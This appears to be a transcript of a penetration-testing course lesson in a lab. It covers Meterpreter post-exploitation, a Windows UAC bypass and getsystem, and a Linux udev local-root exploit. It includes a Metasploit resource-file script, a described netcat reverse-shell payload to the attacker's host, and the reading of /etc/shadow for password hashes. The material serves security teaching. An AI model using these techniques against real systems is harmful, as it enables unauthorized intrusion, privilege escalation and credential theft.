We're in. Now on to post exploitation. I have some open sessions. I have a Meterpreter session from earlier on the XP and Windows 7 systems; we used MS08-067 on XP, and I have just a regular admin user on Windows 7. On the Ubuntu box I have that SSH session, so I am the user georgia, who is a sudoer, but I don't have georgia's password, so I can't sudo.
All right, so let's just jump into one of the sessions. I'll jump into the XP one. If I do help, we can see all our Meterpreter commands. We've seen, like, hashdump previously. You can, like, take a picture from the webcam, record audio, things like that, and we also have, like, upload and download. We can upload, like, netcat from /usr/share/windows-binaries, and it actually puts it on the C drive. It says no such file or directory? Oh, that's windows-binaries. There we go. Likewise you can download. We'll see some more options for how we can do file transfer in the next video.
In the sections so far we've seen TFTP, we've seen netcat, but we have a couple of other options for file transfer when we don't have an interactive shell. Meterpreter does make it really easy, with upload and download, pulling files to and from the system. We also have Meterpreter scripts. I've heard that Meterpreter scripts are supposed to be phased out, and everything's supposed to turn into the post-exploitation model. But, you know, there are still Meterpreter scripts right now, so, uh, might as well use them. I don't know if I'm getting accurate information; I don't know if it's true or not. So if we go to Meterpreter scripts, they're just Ruby scripts that can be run in the Meterpreter session.
For instance, one runs with run and then the script name: getgui. That gives us the help options, if necessary. We could do -e to enable only; we already have a username and password. I ran this when I recorded the video the first time, so it's obviously going to work. There, it said it creates a cleanup script. We didn't see rc files in this class, I don't think, but they're basically just scripts for Metasploit. No special syntax required; it's just one command per line. All right, so I encourage you to spend time trying out the different scripts and different commands. I've given you examples here.
Now let's get to post-exploitation modules. That's what the Meterpreter scripts are apparently going to turn into. You can run a post-exploitation module directly from an open session, like that, but I prefer to do them this way: use post, and let's see, what example do I want to use? enum_logged_on_users. We show options here. My session, again, is set from when I did this previously, so that's session 4, which is against my Windows 7 system, and these don't have payloads. They just need to be told the active session you want to run it against. No RHOST, LHOST, anything like that. There's our currently logged-in user, and users who've logged on as well, like Administrator, like that. We have had some previous users log in, but currently it's just me. That's an example of a post-exploitation module. They're kind of like auxiliaries, except they run on an open session.
We also have local exploits that will work on a current session, so we'll actually see that next: privilege escalation on our sessions. Let's start with session 1. If you do getuid on it, well, I already migrated. Session 1 was open on XP; that should say SYSTEM. But if we do ps and move into another process outside of our server, which is SYSTEM, where we did our MS08-067 (we saw this in our client-sides), we could move into another one and become the regular user georgia. georgia is a local admin there, so she'll have some privileges. Well, on XP that should be pretty simple. To do that we can become SYSTEM with getsystem, which runs a few local privilege escalation techniques.
Like our client-side attacks or even our network-based attacks, it could be some vulnerability locally on our Windows or Linux systems. There's also what's called the local exploits, so it's going to be exploit/windows/local, and one that we could try in here, since certainly getsystem doesn't have every possible local privilege escalation exploit, so we can try additional ones. I probably already set my options here. Indeed I did. So you want to set session again: just set SESSION to 1, exploit. Oh, we're already running as SYSTEM. Yeah, that would stop it. I need to move back to being georgia. What's interesting about these is that rather than taking the open session and escalating it to SYSTEM the way getsystem does, we'll actually run a payload. You didn't actually see one set here because I already ran this one when I made the video without sound, and it creates a new session as SYSTEM. You'll still have the original session, so that can be a little bit confusing. getsystem just escalates the one that you have.
If I do getuid on Windows 7, I'm georgia, but if I do getsystem it actually isn't going to work, because of something called UAC. It certainly is possible that they could be patched and have the global settings set to the point that you can't privilege escalate. But typically that's not going to be the case, right? I mean, if you got this far on a system, chances are there are some vulnerabilities lying around. So with Windows 7 and all the other newer Windows operating systems, you've probably seen UAC. It comes up and says, "Do you want to allow this program to make changes?" And, you know, you have to run things as administrator even though you're an administrative user. If you want to start up the command line and you want to run privileged things, you have to right-click and run as administrator, which was not the case on XP. That makes it a little bit harder to do things like this.
Hackers came up with ways to get around this. So there is a module for bypassing UAC. There's exploit/windows/local/bypassuac, and it does run a payload. We need to set the session again. Already set it? I'll do set SESSION, and you can set the payload or leave the default. You need to be a local admin for this to work. I already did this once; it may actually... All right, I guess it doesn't want to do it twice. I don't have the antivirus on. You do have to essentially have the antivirus off for some of this stuff to work. But it definitely worked before, didn't it? Session 2, georgia. So what you can do is run this bypassuac. It will open a new session. When you interact with that new session you're still going to be the regular user, but then if you do getsystem it will work, because we bypassed UAC, so it will no longer block it. So you should be able to getsystem.
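The Windows steps above (a post module that only needs SESSION, then bypassuac spawning a new session, then getsystem in that new session) as a Metasploit resource script, one console command per line, the same format as the cleanup script getgui writes. This is an added example, not the lecture's own code; the session number, LHOST and LPORT are assumed values you would replace with your own.

```sh
#!/bin/sh
# Added example (not from the lecture): write a Metasploit resource (rc) file
# that chains the post module and the UAC bypass, then run it with msfconsole -r.
# Assumed values: session 1 is the Windows 7 Meterpreter session and
# 192.0.2.10:4445 is the Kali listener for the bypassuac payload.

# write_post_rc RC_PATH SESSION LHOST LPORT
# Post modules only need SESSION (no RHOST/LHOST); the local exploit runs a
# payload of its own, so it takes LHOST/LPORT like a remote exploit would.
write_post_rc() {
    rc=$1; sess=$2; lhost=$3; lport=$4
    cat > "$rc" <<EOF
# Post module: kind of like an auxiliary, but it runs on an open session
use post/windows/gather/enum_logged_on_users
set SESSION $sess
run
# Local exploit: bypasses UAC and spawns a NEW session (the original stays open)
use exploit/windows/local/bypassuac
set SESSION $sess
set LHOST $lhost
set LPORT $lport
exploit
EOF
}

# rc_commands RC_PATH: print only the commands msfconsole will execute
# (comment and blank lines dropped), to eyeball the script before running it.
rc_commands() {
    grep -v -e '^#' -e '^$' "$1"
}

rc="${TMPDIR:-/tmp}/post_win7.rc"
write_post_rc "$rc" "${SESSION:-1}" "${LHOST:-192.0.2.10}" "${LPORT:-4445}"
rc_commands "$rc"
# Then, in a console that already holds the session:  msfconsole -q -r "$rc"
# bypassuac returns a new session as the same regular user; interact with it
# and run getsystem there, which now works because UAC no longer blocks it.
```

The script stops at `exploit` on purpose: the new session bypassuac opens is interactive, so `sessions -i` and `getsystem` are typed by hand, the same way the lecture does it.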
All right, we're going to try something a little bit different on our Ubuntu system. So we are the user georgia, who is a sudoer, but we don't have our password to do our sudo-ing. We're going to take a look at using a public exploit from Exploit Database. We do have Exploit Database locally on our Kali system in /usr/share/exploitdb, so we can use wget to pull things down if we just put them on our web server. With online access you could just as easily do the same thing. So we can get some information about this guy: we can do lsb_release -a. So this is Ubuntu 8.10, Intrepid, which is a bit out of date. Newer ones also have vulnerabilities; in some classes I use 11.10, which has a vulnerability as well. I generally keep up with these because I do Android exploitation, so a lot of the same ones that come up in Android come up in Linux proper, since it is a fork with some changes. So the one we're going to do here came up in Android as well, as did the 11.10 one.
So we can also get information about the kernel. If we do some searching, this version of Ubuntu does have a vulnerability in the udev module. I always have to look this up; it's like, something about udev. This is very specific. So let's see, I could probably have just... it's not done. We want our version. So udevinfo tells us the version of udev is 124, and anything that is 140 or earlier, I believe, does have an issue. It is a logic issue, so it's not memory corruption, which makes it nice for working with the exploit: we don't have to worry about switching out shellcode or anything like that. We're actually going to do this one, the .c right here, looking in platforms/linux.
So there is no shellcode; basically it's creating a netlink message and sending it. It has it explained up here. Another reason I like this example is it does explain how to use it and what's going on: udev before 1.4.1 does not verify whether a netlink message originates from kernel space, which allows local users to gain privileges by sending a netlink message from user space. So what that means basically is: udev basically loads device drivers. Like, for instance, when you plug in a USB, it will load up the drivers for that, and they run as root. That's udev's job, basically. So before 1.4.1, on Android and on Linux proper (well, you didn't have udev, but the process worked the same way), basically, if you send it the correct kind of message, which you can look up the specs and figure out how to send, even if you're not from kernel space, you can send it this message, and it will gladly run as root whatever code you tell it to, as though it was your device driver. So that's exactly what this exploit does: it creates the correct kind of message and sends it and says, run this for me. It says it's tested on Intrepid, so that's what we have. Under usage, it says pass the PID of the udevd netlink socket, as listed in /proc/net/netlink, and it's usually the udevd PID minus one, as argv[1], which in C is the first command-line argument.
So we need to find some information to pass to it. Then it says the exploit will execute /tmp/run as root, so throw whatever payload you want in there. A lot of your local privilege escalations will basically just take over the current process and execute /bin/bash, and you'll be running as root. In this case, just because this is a logic flaw of the particular kind that it is, it's just going to run code on your behalf as though it's a device driver, so we're going to have to be a little bit more creative about it. My solution certainly isn't the only one, but it works, so you're welcome to try something else. You just have to put something in /tmp/run, which we should have access to. Everybody should have access to /tmp.
All right, first things first. We need to find that PID of the udevd netlink socket. It says it's listed in /proc/net/netlink. We do have read access to it. Here's the PIDs: 1, 2, 3, 4. It looks like there's four of them. I'm not sure which one is the udevd netlink socket. Maybe I could try and figure out what the sk things are and figure it out, but I don't know enough about Linux kernels to be able to tell you. But it gives me another hint: it's usually the udevd PID minus one. I know how to find a process ID: ps aux | grep udev. It might grep itself. And here's /sbin/udevd --daemon; 2512 is its process ID, and it says it's usually the PID of udevd minus one. So this is 12, this is 11. 2511 looks right to me.
We also need to put something in that /tmp/run. That will be our payload. Since I already just recorded this, let's look at what I put there. It's executed in a shell, so we need our hashbang, #!/bin/bash, to tell it these are bash commands. Then I just do a netcat to the IP address of Kali, which did change. I tried really hard to keep the same IPs throughout the entire class, which, as much as I travel, has not been easy, but I've finally failed. So, port 2222, and execute /bin/bash. We saw this same sort of thing in our injection section. That's just going to be our payload, and to catch it over here we're going to listen on Kali on 2222.
So we need to do our wget. Well, we need to copy it over; I already did that. Make sure the web server's running, and turn this back on. wget makes it easy. It was already on there, so it made it .1. We do typically have gcc for compiling C files on Linux, which is also nice: gcc 8572.c -o exploit. ./exploit: we created our /tmp/run, so it's hard-coded to run that for us, and 2511 is our argument. So it looks like we got a connection over here. We don't have a prompt, but if we do whoami, I'm root. cat /etc/shadow: we got password hashes. We saw those in password cracking already. That's just a little intro to local privilege escalation and using public exploits. Again, I encourage you to spend the time to read any public exploit and replace anything, like shellcode, that you can't read, because you never really know. Otherwise, it doesn't really have the same oversight that we have on some of our other tools.